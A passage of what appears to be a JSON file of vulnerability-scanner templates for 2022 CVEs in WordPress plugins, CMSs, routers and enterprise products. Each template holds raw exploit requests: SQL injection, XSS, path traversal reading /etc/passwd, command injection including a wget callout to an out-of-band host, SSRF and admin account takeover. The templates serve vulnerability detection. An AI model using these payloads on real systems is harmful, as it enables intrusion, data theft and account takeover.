4165367067776535676f31442e6a7370504b05060000000002000200d6000000e00100000000\")}}\n","GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["/service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1","/service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 401","status_code_2 == 200","contains(body_2,'NcbWd0XGajaWS4DmOvZaCkxL1aPEXOZu')"],"condition":"and"}]}]},{"id":"CVE-2022-0434","info":{"name":"WordPress Page Views Count <2.4.15 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5({{num}}),null,null%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4325","info":{"name":"WordPress Post Status Notifier Lite <1.10.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=post-status-notifier-lite&controller=%3Cscript%3Ealert%28%60document.domain%60%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<script>alert(`document.domain`)</script>\")","contains(body_2, \"Post Status Notifier Lite\")"],"condition":"and"}]}]},{"id":"CVE-2022-45038","info":{"name":"WBCE CMS v1.5.4 -  Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/settings/ HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/settings/save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadvanced=no&formtoken={{formtoken}}&website_footer=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_trash=inline&home_folders=true&intro_page=false&frontend_login=false&frontend_signup=false&submit=&default_language=EN&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&wbmailer_default_sendername=WBCE+CMS+Mailer&wbmailer_routine=phpmail&wbmailer_smtp_host=&wbmailer_smtp_port=&wbmailer_smtp_secure=&wbmailer_smtp_username=&wbmailer_smtp_password=\n","GET /search/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Results For"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"app_name","group":1,"regex":["name=\"app_name\" value=\"(.*?)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-45269","info":{"name":"Linx Sphere - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../windows/iis.log"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Component Based Setup"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0773","info":{"name":"Documentor <= 1.5.3 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=doc_search_results&term=&docid=1+AND+(SELECT+6288+FROM+(SELECT(SLEEP(6)))HRaz)\n","GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(content_type_1, \"text/html\")","contains(body_1, \"([])\") && contains(body_2, \".documentor-help\")"],"condition":"and"}]}]},{"id":"CVE-2022-1815","info":{"name":"Drawio <18.1.2 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /service/0/test.oast.me HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'Interactsh Server')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-32771","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["avideoAlertSuccess(\"</script><script>alert(document.cookie);</script>","text: \"</script><script>alert(document.cookie);</script>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0594","info":{"name":"WordPress Shareaholic <9.7.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["plugin_version","shareaholic_server_reachable"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25082","info":{"name":"TOTOLink - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/downloadFlile.cgi?payload={{cmd}} HTTP/1.1\nHost: {{Hostname}}\n","GET /{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":[".sh",".cgi"],"condition":"and"},{"type":"word","part":"header_2","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34753","info":{"name":"SpaceLogic C-Bus Home Controller <=1.31.460 - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /delsnap.pl?name=|id HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64('{{username}}:' + '{{password}}')}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29005","info":{"name":"Online Birth Certificate System 1.2 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /obcs/user/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nmobno={{username}}&password={{password}}&login=\n","POST /obcs/user/profile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nfname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&lname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&add=New+Delhi+India+110001&submit=\n","GET /obcs/user/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, 'admin-name\\\">{{str}}<script>alert(document.domain);</script>')"],"condition":"and"}]}]},{"id":"CVE-2022-35653","info":{"name":"Moodle LTI module Reflected - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /mod/lti/auth.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nxxx\"><img/src%3d'x'onerror%3dalert('document_domain')>=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img/src='x'onerror=alert('document_domain')>","moodle-editor"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1170","info":{"name":"JobMonster < 4.5.2.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/resumes/?s=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","noo-resume"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0595","info":{"name":"WordPress Contact Form 7 <1.3.6.3 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161\n\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"size_limit\"\n\n10485760\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"action\"\n\ndnd_codedropz_upload\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"type\"\n\nclick\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"upload-file\"; filename=\"{{randstr}}.svg\"\nContent-Type: image/jpeg\n\n<svg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(document.domain)\"/>\n-----------------------------92633278134516118923780781161--\n","GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.svg HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"alert(document.domain)\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-0784","info":{"name":"WordPress Title Experiments Free <9.0.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wpex_titles&id[]=1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{\\\"images\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2022-47966","info":{"name":"ManageEngine - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /SamlResponseServlet HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLResponse={{url_encode(base64(SAMLResponse))}}&RelayState=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Unknown error occurred while processing your request"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-2486","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-0212","info":{"name":"WordPress Spider Calendar <=1.5.65 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=window&callback=</script><img/src/onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["spider_Calendar_theme","</script><img/src/onerror=alert(document.domain)>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0760","info":{"name":"WordPress Simple Link Directory <7.7.2 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=qcopd_upvote_action&post_id=(SELECT 3 FROM (SELECT SLEEP(7))enz)\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200 || status_code == 500","contains(content_type, \"text/html\")","contains(body, \"vote_status\") || contains(body, \"critical error\")"],"condition":"and"}]}]},{"id":"CVE-2022-4063","info":{"name":"WordPress InPost Gallery <2.1.4.1 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ=="],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0817","info":{"name":"WordPress BadgeOS <=3.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=get-achievements&total_only=true&user_id=11 UNION ALL SELECT NULL,CONCAT(1,md5({{num}}),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, md5(num))","contains(content_type, \"application/json\")","contains(body, \"badgeos-arrange-buttons\")"],"condition":"and"}]}]},{"id":"CVE-2022-45362","info":{"name":"WordPress Paytm Payment Gateway <=2.7.0 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /?paytm_action=curltest&url={{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["paytm-payments.css"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31474","info":{"name":"BackupBuddy - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0482","info":{"name":"Easy!Appointments <1.4.3 - Broken Access Control","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncsrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"appointments\":","\"unavailables\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","name":"csrf_token","internal":true,"kval":["csrfCookie"],"part":"header"}]}]},{"id":"CVE-2022-2314","info":{"name":"WordPress VR Calendar <=2.3.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["phpinfo","PHP Version"],"condition":"and"},{"type":"word","part":"body_1","words":["vrc-calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0165","info":{"name":"WordPress Page Builder KingComposer <=2.9.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2022-43167","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_alerts/users_alerts&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=warning&title=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&location=all&start_date=&end_date=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-44947","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/listing_highlight&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&is_active=1&fields_id=193&fields_values%5B%5D=67&bg_color=&sort_order=&notes=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0234","info":{"name":"WordPress WOOCS < 1.3.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=woocs_get_products_price_html&woocs_in_order_currency=<img%20src%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","\"current_currency\":"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1040","info":{"name":"Sophos Firewall <=18.5 MR3 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"\ud83e\udd9e\":\"test\"}"],"headers":{"X-Requested-With":"XMLHttpRequest"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"status\":\"Session Expired\"}"]},{"type":"word","part":"header","words":["Server: xxxx"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0189","info":{"name":"WordPress RSS Aggregator < 4.20 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nid=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(`document.domain`)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1903","info":{"name":"ARMember < 3.4.8 - Unauthenticated Admin Account Takeover","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=arm_shortcode_form_ajax_action&user_pass={{randstr}}&repeat_pass={{randstr}}&arm_action=change-password&key2=x&action2=rp&login2=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Your Password has been reset","arm_success_msg"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47002","info":{"name":"Masa CMS - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\nHost: {{Hostname}}\nCookie: userid={{uuid}}; userhash=\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3,\"\\\"userid\\\"\")"],"condition":"and"},{"type":"word","part":"body_3","words":["Edit Profile"]}],"extractors":[{"type":"regex","name":"siteid","group":1,"regex":["siteid:\"(.*?)\""],"internal":true,"part":"body"},{"type":"regex","name":"uuid","group":1,"regex":["\"lastupdatebyid\":\"([A-F0-9-]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-34048","info":{"name":"Wavlink WN-533A8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=196.219.234.10&login_page=x\");alert(9);x=(\"&homepage=main.html&sysinitpage=sysinit.shtml&wizardpage=wiz.shtml&hostname=0.0.0.1&key=M94947765&password=ab4e98e4640b6c1ee88574ec0f13f908&lang_select=en\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["x\");alert(9);x=(\"?login=0\");</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46463","info":{"name":"Harbor <=2.5.3 - Unauthorized Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v2.0/search?q=/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["repository_name","project_name"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1392","info":{"name":"WordPress Videos sync PDF <=1.7.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["failed to open stream: No such file or directory","REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1439","info":{"name":"Microweber <1.2.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div class='x module module-'onmouseover=alert(document.domain) '","parent-module-id"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-48165","info":{"name":"Wavlink - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportLogs.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Password=","Login="],"condition":"and"},{"type":"word","part":"header","words":["filename=\"sysLogs.txt\""]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Password=([^\\s]+)"]}]}]},{"id":"CVE-2022-0346","info":{"name":"WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting/Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp","{{BaseURL}}/?p=1&xsg-provider=data://text/html,<?php%20echo%20md5(\"CVE-2022-0346\");%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body_1","words":["<img src onerror=alert(document.domain)>","Invalid Provider type specified"],"condition":"and"},{"type":"word","part":"body_2","words":["2ef3baa95802a4b646f2fc29075efe34"]}]}]},{"id":"CVE-2022-42095","info":{"name":"Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/page HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntitle={{randstr}}&body%5Bund%5D%5B0%5D%5Bsummary%5D=&body%5Bund%5D%5B0%5D%5Bvalue%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E%0D%0A&body%5Bund%5D%5B0%5D%5Bformat%5D=full_html&changed=&form_build_id={{form_id_2}}&form_token={{form_token}}&form_id=page_node_form&status=1&scheduled%5Bdate%5D=2023-04-14&scheduled%5Btime%5D=21%3A00%3A54&name=admin&date%5Bdate%5D=2023-04-13&date%5Btime%5D=21%3A00%3A54&path%5Bauto%5D=1&menu%5Benabled%5D=1&menu%5Blink_title%5D=test&menu%5Bdescription%5D=&menu%5Bparent%5D=main-menu%3A0&menu%5Bweight%5D=0&comment=1&additional_settings__active_tab=&op=Save\n","POST /?q={{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_5 == 200","contains(header_5, 'text/html')","contains(body_5, \"<img src=\\\"x\\\" onerror=\\\"alert(document.domain)\\\" />\")","contains(body_5, 'Backdrop CMS')"],"condition":"and"}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-35416","info":{"name":"H3C SSL VPN <=2022-07-10 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wnm/login/login.json HTTP/1.1\nHost: {{Hostname}}\nCookie: svpnlang=<script>alert('document.domain')</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('document.domain')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40032","info":{"name":"Simple Task Managing System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /task/loginValidation.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin=test'%20AND%20(SELECT%208979%20FROM%20(SELECT(SLEEP(7-(IF(ORD(MID((SELECT%20DISTINCT(IFNULL(CAST(schema_name%20AS%20NCHAR)%2c0x20))%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%200%2c1)%2c12%2c1))%3e48%2c0%2c1)))))jaXJ)--%20HgKq&password=\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 302","contains(location, 'login.php')","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2022-31978","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_inquiry HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\")"],"condition":"and"}]}]},{"id":"CVE-2022-0656","info":{"name":"uDraw <3.3.3 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=udraw_convert_url_to_base64&url=/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["cm9vd","data:image\\/;base64"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43769","info":{"name":"Hitachi Pentaho Business Analytics Server - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('{{interactsh-url}}')}&mgrDn=a&pwd=a"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["false"]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2022-34576","info":{"name":"WAVLINK WN535 G3 - Improper Access 